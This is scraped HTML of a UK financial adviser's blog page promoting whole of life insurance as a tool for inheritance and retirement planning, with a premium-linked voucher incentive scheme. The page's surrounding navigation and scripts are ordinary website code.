class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Whole of life insurance – an advisers tale										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/insurance-protection/\" title=\"Insurance Protection\">Insurance Protection</a></li><li>Whole of life insurance – an advisers tale</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-8314\" class=\"post-8314 post type-post status-publish format-standard has-post-thumbnail hentry category-insurance-protection post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Whole of life insurance – an advisers tale</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p><a href=\"https://my.leadpages.net/leadbox/146c88073f72a2%3A125d9572eb46dc/5698497110081536/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../jHlV3oak2WI1DxRJdjuhhi6wBsRZ_bDpBWxHDuCouX8JKWFCUAuuWIiuePc_yJeaQUQpNWTFeNSay3w793Y1Hg_s0.jpg\" alt=\"\"/></a></p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1>Whole of Life Assurance – an Advisers tale</h1>&#13;\n<h3 style=\"text-align: left;\">By : Reading Time 7 Minutes.&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:2px;margin-bottom:10px;\"/>&#13;\n</h3><p>I’ve been insuring people’s lives for around twenty five years now.</p>&#13;\n<p>When I started in the industry one of the most popular policy was Whole of Life. It gave clients the life cover they needed; it ran – as the name suggests – for the whole of their life – and it built up an investment value, so over time it gave both protection and savings.</p>&#13;\n<p>But gradually, Whole of Life fell out of favour.</p>&#13;\n<p>People were living longer – which meant that premiums for straightforward term assurance dropped significantly.</p>&#13;\n<p>Suddenly, Whole of Life looked expensive – especially when the investment returns weren’t so good and the premiums had to go up.</p>&#13;\n<p>As the internet boomed and online sales of life cover increased, price became almost the only criterion for buying life cover. Get the cover you need, forget about long term financial planning and the cheaper the better.</p>&#13;\n<p>That was fine in the short term.</p>&#13;\n<p>The problem was, that more evidence from clients showed that it didn’t work in the long term.</p>&#13;\n<p>Over the years I saw hundreds of clients realise that they still needed life cover later in life.</p>&#13;\n<p>Maybe they needed it to cover loans on their mortgages and debt.</p>&#13;\n<p>Maybe they’d re-married and had a second family.</p>&#13;\n<p>Maybe they wanted to protect their estate against inheritance tax.</p>&#13;\n<p>There were as many different reasons as there were clients. But they all had one thing in common – the life cover they needed was now expensive. Or even worse, it was impossible to obtain because their health had changed.</p>&#13;\n<p>Maybe what they’d needed all along was Whole of Life…</p>&#13;\n<p>In fact, maybe what we all need is Whole of Life – because Whole of Life has changed dramatically.</p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div><div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element  vc_custom_1400829229539\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<ul><li>&#13;\n<p>Premiums on Whole of Life have dropped significantly over the years and they are now guaranteed to remain constant for the whole of your life. It doesn’t matter how old you get, your premiums will never change and you will always have life cover</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>The investment element of Whole of Life – and the variable returns that made it so difficult to plan – has gone. Instead there are now guaranteed sums assured that you can rely on.</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>This means that Whole of Life can now address a variety of financial planning needs. It can give you choice, flexibility and control.</p>&#13;\n</li>&#13;\n</ul><p>    </p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div><div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p>And there are five very good reasons why a properly designed whole of life insurance policy might well be the answer to your financial planning needs:</p>&#13;\n<p>Whole of Life can offer great value for money  For many customers term life insurance can appear to be a waste of money as they don’t (of course) intend to die during the term. Whole of Life is fundamentally different as it will eventually pay-out.</p>&#13;\n<p><a href=\"#\"/></p>&#13;\n<pre>Quotations based on level cover for males and assume standard terms - source Assure web 7th May 2017</pre>&#13;\n<p> </p>&#13;\n<p>Whole of Life secures your family’s inheritance  Whole of Life is guaranteed to pay out when you eventually die: the ‘term’ can never run out. So you can rest assured that your family’s inheritance is secure. It doesn’t matter what happens to your investments: it doesn’t matter what happens to property prices – a Whole of Life policy provides a known and guaranteed inheritance for your family.</p>&#13;\n<p>Whole of Life can make all the difference to your retirement planning  The new pensions rules have given everyone a lot more choice and flexibility – unless you eventually want to leave your pension ‘pot’ to your beneficiaries. That would mean you couldn’t spend it during your lifetime – and that’s where Whole of Life comes in. By providing a guaranteed inheritance Whole of Life means you have far more flexibility as to how your take your pension benefits: you no longer have to worry about your pension providing an inheritance for your family.</p>&#13;\n<p>Whole of Life protects the family home  Many people plan to pass their family home on to their children – but end up being unable to do so as they’ve had to use the house to top-up their retirement income. That’s not a problem when there’s a Whole of Life policy in place to provide a guaranteed inheritance for your family. You get the income you need in retirement: your family receive the inheritance you’ve always been determined to leave them.</p>&#13;\n<p>A Whole of Life policy will live as long as you do…  Sadly, we’re all going to die one day. The problem is none of us knows when that will be. And if you still need life cover – for any of the reasons we’ve outlined above – Whole of Life is a sensible solution.</p>&#13;\n<p>It’s the only type of policy guaranteed to be always in force: it’s the only type of policy where an insurance company can’t say, “We’re sorry, you’re too old.” Or where you have to tell your family, “I’m sorry, I can’t afford the cover any more.”</p>&#13;\n<p>None of us know what’s round the corner or contemplate our own mortality – but a Whole of Life policy will cope with whatever life throws at you. It provides guaranteed protection: it can protect your family, protect your business; protect your inheritance and play a crucial part in your retirement planning.</p>&#13;\n<p>So what are the disadvantages?</p>&#13;\n<p>Whole of life cover will be more expensive than term insurance that pays out during a set term. These must be weighed up when shopping around for the right life cover for you and your dependants.</p>&#13;\n<p>Retirement usually brings to mind for many people the thoughts of liberation from work, from responsibility, from routine and from permanent. Planning for death may may not be in the plan, but should it.</p>&#13;\n<p>For increasing  numbers of clients, Whole of Life should be considered as the cornerstone of their financial planning, or at the very least a hybrid of cover alongside their term insurance.</p>&#13;\n<p>To see how Whole of Life could work for you, please don’t hesitate to get in touch with us. We’re happy to listen, and to help.</p>&#13;\n<p>Warmest Regards</p>&#13;\n<p>Sam</p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div><div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<div class=\"accordian\"> <h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Learn More About Our Incentives</a></h5><div class=\"toggle-content \" style=\"display: none;\">&#13;\n<p>Sometimes we provide incentives on selected products with the value of the vouchers that you qualify for will directly relate to the value of your monthly premium.</p>&#13;\n<p>£80 monthly premium or over iPad Mini,</p>&#13;\n<p>£70 monthly premium or over qualify for £150.00 worth of vouchers.</p>&#13;\n<p>£60 monthly premium or above will qualify for £130.00 worth of vouchers.</p>&#13;\n<p>£50 monthly premium or above will qualify for £110.00 worth of vouchers.</p>&#13;\n<p>£40 monthly premium or above will qualify for £90.00 worth of vouchers.</p>&#13;\n<p>£30 monthly premium or above will qualify for £70.00 worth of vouchers.</p>&#13;\n<p>£20 monthly premium or above will qualify for £50.00 worth of vouchers.</p>&#13;\n<p>£10 monthly premium or above will qualify for £30.00 worth of vouchers.</p>&#13;\n<p>We will confirm your gift when we have completed your application and you plan has been in force for 3 months. We fund your vouchers from commissions we receive from your insurer and are subject to maintaining premiums for between 2 and 4 years.</p>&#13;\n<p>Therefore you will have a contractual obligation to maintaining your premiums for this period as a minimum or alternatively pay back the cash equivalent of the vouchers you received. A maximum of one gift per household will be paid over any 12 month period Equity SMART reserves the right to remove this promotion at any time and to alter the terms and conditions at any time. This does not affect your statutory rights to cancel the policy. You are under no obligation to take the voucher.</p></div> </div>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p><a href=\"https://my.leadpages.net/leadbox/146c88073f72a2%3A125d9572eb46dc/5698497110081536/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../jHlV3oak2WI1DxRJdjuhhi6wBsRZ_bDpBWxHDuCouX8JKWFCUAuuWIiuePc_yJeaQUQpNWTFeNSay3w793Y1Hg_s0.jpg\" alt=\"\"/></a></p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></span><span class=\"sep\">|</span>Categories: <a href=\"../category/insurance-protection/\" title=\"View all posts in Insurance Protection\" rel=\"category tag\">Insurance Protection</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><span>Comments Off</span>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/whole-life-advisers-tale/&amp;p[title]=Whole%20of%20life%20insurance%20%E2%80%93%20an%20advisers%20tale\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Whole+of+life+insurance+-+an+advisers+tale%20http://www.equalitywalk.org.uk/whole-life-advisers-tale/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/whole-life-advisers-tale/&amp;title=Whole%20of%20life%20insurance%20%E2%80%93%20an%20advisers%20tale\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/whole-life-advisers-tale/&amp;title=Whole%20of%20life%20insurance%20%E2%80%93%20an%20advisers%20tale\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fwhole-life-advisers-tale%2F&amp;name=Whole+of+life+insurance+-+an+advisers+tale&amp;description=Whole+of+Life+can+offer+great+value+for+money+For+many+customers+term+life+insurance+can+appear+to+be+a+waste+of+money+as+they+don%E2%80%99t+%28of+course%29+intend+to+die+during+the+term.+Whole+of+Life+is+fundamentally+different+as+it+will+eventually+pay-out.\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/whole-life-advisers-tale/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Whole of life insurance – an advisers tale&amp;body=http://www.equalitywalk.org.uk/whole-life-advisers-tale/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/paul/\" title=\"Posts by Becky Barnet\" rel=\"author\"/></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\"/>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are closed. -->&#13;\n		<p class=\"no-comments\">Comments are closed.</p>&#13;\n&#13;\n	&#13;\n&#13;\n								</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../whole-life-advisers-tale/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n									<div class=\"meta\">&#13;\n										May 22nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (4)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (8)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../whole-life-advisers-tale/\">Whole of life insurance – an advisers tale</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" 